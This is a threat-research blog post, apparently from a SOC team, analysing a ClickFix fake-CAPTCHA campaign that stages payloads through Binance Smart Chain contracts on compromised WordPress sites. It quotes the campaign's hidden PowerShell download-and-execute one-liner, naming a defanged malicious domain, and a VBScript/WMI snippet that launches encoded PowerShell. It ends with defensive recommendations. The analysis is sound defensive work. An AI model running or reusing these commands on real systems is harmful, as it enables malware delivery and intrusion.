Beyond the Click: Forensic Analysis of Etherhiding in ClickFix Campaign Infrastructure 

The modern threat landscape consistently leverages new technologies within malicious campaigns and kill chains. The utilization of these techniques helps provide these threat actors with an edge over their targets. The Blackpoint SOC continues to see the utilization of Blockchain, more specifically smart contracts on the Binance Smart Chain (BSC), within ClickFix campaigns. The BSC is leveraged to stage malicious payloads utilized within these ClickFix Campaigns. The utilization of BSC smart contracts within these campaigns is associated with the technique known as Etherhiding.  

Key Takeaways: 

• Threat actors continue to adapt and utilize new and upcoming technology within their kill chains. 
• Threat actors leverage compromised WordPress sites to host malicious JavaScript, which retrieves a second stage payload from the BSC.  
• BSC provides threat actors with the ability to run decentralized applications and smart contracts. 
• Etherhiding abuse these smart contracts to host malicious code within the Blockchain. 
• Due to the permanent nature of the blockchain, once the contract is created, it cannot be taken down. 

What is EtherHiding? 

Binance is one of the largest cryptocurrency exchanges in the world. Binance Smart Chain (BSC) is Binance’s proprietary competitor to Ethereum, offering the ability to run decentralized apps and smart contracts. Think of a smart contract as a digital agreement, which executes specific actions once the correct conditions are met.  

Etherhiding abuses BSC smart contracts to host malicious code within the Blockchain. Due to the permanent nature of the blockchain, once the malicious code is pushed to the chain, it cannot be removed. Additionally, this technique allows a threat actor to update their entire campaign at once, by pushing a single update to the contract being called to. 

Threat Actors Love WordPress (Almost as Much as Admins Love “admin123”) 

The Blackpoint SOC recently responded to an incident in which two users fell for a Fake Captcha sourcing from an ongoing ClickFix campaign. This activity was alerted on by Microsoft Defender for Endpoint (MDE) detecting ClickFix behavior sourcing from explorer.exe. 

Image 1 -> Microsoft Defender for Endpoint alerts flagging this ClickFix activity 

Investigation into these devices found that this specific Fake Captcha socially engineered users into running the below PowerShell command via the Windows Run Dialog Box.  

powershell.exe                UNKNOWN                       8168    powershell.exe -w h (irm -useb ‘hxxps[://]<malicious domain>/e2e8676e-b8e2-4565-a276-724f7a7a417d.t’ ) | powershell; “” BotGuard: Answer the protector challenge. Ref: 643811424     

This malicious PowerShell command does the following: 

• Launches PowerShell in a Hidden Windows using -w h 
• Utilize shortcut (irm -useb) to call Invoke-RestMethod -UseBasicParsing 
• Downloads the contents of the file hosted at the malicious domain 
• Pipes the downloaded content into a second PowerShell instance 
• This will execute the contents of whatever is hosted on this malicious domain 

The above commands are associated with the first stage of this ClickFix campaign. This same activity flagged for a different host in this network within 10 minutes of this first alert. This is interesting because it indicates that these users are either receiving the link to this compromised site via email or are visiting a well-known site which led to their compromise.  

Open-Source Intelligence (OSINT) found that the company’s WordPress site was compromised via this ClickFix campaign.  

Image 2 – The Fake Captcha hosted on the customer’s compromised WordPress site 

Further investigation into this compromised site found the IOCs tied to an ongoing ClickFix campaign. The HTML had JavaScript which called a reCAPTCHA from gstatic. Gstatic is a google resource which hosts static content, including JavaScript code, which is utilized in providing cached resources when a client visits a site.  

Image 3 – HTML code calling reCaptcha from gstatic Domain 

Further digging into the site found the injected ClickFix content tied to this Fake Captcha. The JavaScript associated with this campaign is heavily obfuscated, however analysis found it was obfuscated using a free online JavaScript obfuscator Obfuscator[.]io. 

Image 4 – Malicious ClickFix JavaScript injected into compromised WordPress site 

This obfuscated JavaScript can be deobfuscated using obf-io[.]deobfuscate[.]io, which provides cleaner and more readable JavaScript. 

Image 5 – Deobfuscating the JavaScript using obf-io[.]deobfuscate[.]io 

Analysis into the deobfuscated ClickFix JavaScript found that it operates as a loader and does the following: 

• Utilizes string scrambling, console-tampering, and self-checks to try and evade detection / triaging 
• Calls out to Binance Smart Chain test-net node via a JSON-RPC request 
• Inspects User Agent of the user visiting the compromised site 
• Delivers a different payload depending on whether the visiting device is Windows or MacOs based 
• Returns and provides the correct payload based on the visiting operating system of the device 

The main use case for this JavaScript is to load, decode, and serve the correct payload depending on the operating system of the affected device. There are two different Binance contract addresses associated with the loader, which serve a unique payload based on the victim’s OS. 

Analyzing the smart contract itself, we can see it’s designed to act as a stealthy storage container for malicious data, specifically a chunk of encoded JavaScript that will later be executed on the victim’s machine. Unlike normal smart contracts that implement things like finance (DeFi), NFTs, or games, this contract is weaponized to quietly hold malware in its internal storage and allow anyone to fetch it without making a public transaction. 

The key function in the contract is one that looks like this conceptually: 

Image 6 – Conceptual framework of the main function 

Internally, this function is designed to return a blob of data stored on-chain. This data is base64-encoded JavaScript, and when the loader script issues an eth_call to the contract, it retrieves the payload, decodes it, and immediately executes it. Because eth_call is a read-only operation, it leaves no trace on-chain, making it ideal for stealthy malware delivery. 

Beyond that, the smart contract includes standard “ownable” features. This means there’s an owner (the address that deployed it), and only the owner can change the contents of the payload. It includes functions to: 

• Get the current owner address 
• Transfer ownership to another address 
• Update or overwrite the payload in storage 

It also includes safeguards to prevent unauthorized modification. Any attempt to change contract state by an address other than the owner results in an error: “This can only be called by the contract owner!” 

Reviewing the transaction history for the BSC, we identified the contract was created on December 8th, 2024, from the attacker-controlled address. This address was generated earlier that same day and funded with approximately $195.72 USD worth of BNB. 

Image 7 – Smart contract creation 

This initial funding allowed the attacker to deploy and later update the smart contract. Although eth_call itself is free, deploying or modifying the contract requires gas fees, which are paid using BNB and depend on transaction complexity. 

Each contract update consists of a hex-encoded base64 string, which when decoded reveals the updated second-stage JavaScript. Analysis of multiple contract states shows that these updates frequently change the hardcoded third-stage domain, allowing the attacker to quickly shift infrastructure by simply pushing a new payload to the blockchain. 

Image 8 – Smart contract update event 

Image 9 – The base64 encoded contents of the update 

Image 10 – Decoded contents of the contract payload 

Further analysis into the decoded contents of the code being served by the Smart Contract found that it is obfuscated again utilizing obfuscator[.]io. This code can once again be quickly deobfuscated, which provides further insight into the functionality of the payload. 

Image 11 – Deobfuscating the malicious payload using obf-io[.]deobfuscate[.]io 

The JavaScript returned from the contract builds the fake CAPTCHA overlay, handles visual deception with HTML/CSS, and copies a malicious mshta-based PowerShell command to the victim’s clipboard.  

To track user interaction with the phishing site, the JavaScript establishes a unique identifier per visitor. This is done using a UUIDv4 generator embedded in the loader script. On page load, the script calls generateUUIDv4() to create a new universally unique identifier (UUID). This identifier is saved as a cookie named cjs_id in the victim’s browser and persists for two days. 

Once the identifier is created and stored, the loader begins polling the smart contract via the isGoalReached() function. This function performs a JSON-RPC eth_call to the contract on the Binance Smart Chain Testnet, passing in the UUID as part of the encoded call data. The contract stores a list of UUIDs representing victims who have executed the malicious payload. If the UUID is found in the contract’s response, the loader script interprets this as a successful execution and removes the fake CAPTCHA overlay from the screen. 

Image 12 – Malicious mshta command within payload 

This mshta-based PowerShell command executes a Bash script (.sh file) from a Russian domain. This can be seen by correlating the “dmn” variable, which points to this malicious staging domain.  

Image 13 + 14  – Correlating “dmn” variable to malicious staging domain 

Visiting this malicious Bash script file found that it is heavily obfuscated. However, further investigation found that this appears to be an ISO file, which has malicious JavaScript smuggled within.  

Image 15  & 16  –  Malicious bash script is an ISO file with smuggled JavaScript 

The JavaScript can be parsed out by grepping for the <script> tags within the HTML, which provides us with the payload, executed by mshta within this ClickFix campaign.  

Image 17 –  Smuggled JavaScript within this hosted ‘ISO’ file 

Looking into this smuggled JavaScript found that its main functionality is to act as a loader. This loader executes a fileless payload, which utilizes VBScript to execute PowerShell via Windows Management Instrumentation (WMI) 

window.execScript( 

  ‘GetObject(“winmgmts:”).Get(“Win32_Process”).Create “powershell.exe -w h -nop -ep un -E <base64 payload>”‘, 

  ‘VBScript’ 

); 

Recommendations 

• Restrict usage of the Windows Run Dialog Box via a Group Policy Object (GPO). 
• Monitor and audit changes on publicly exposed sites 
• Patch and ensure all running WordPress sites are patched and not vulnerable 
• Restrict PowerShell usage 
• Monitor and flag any network callouts to Binance Smart Chain / Web 3.0 addresses 

By Nevan Beal & Sam Decker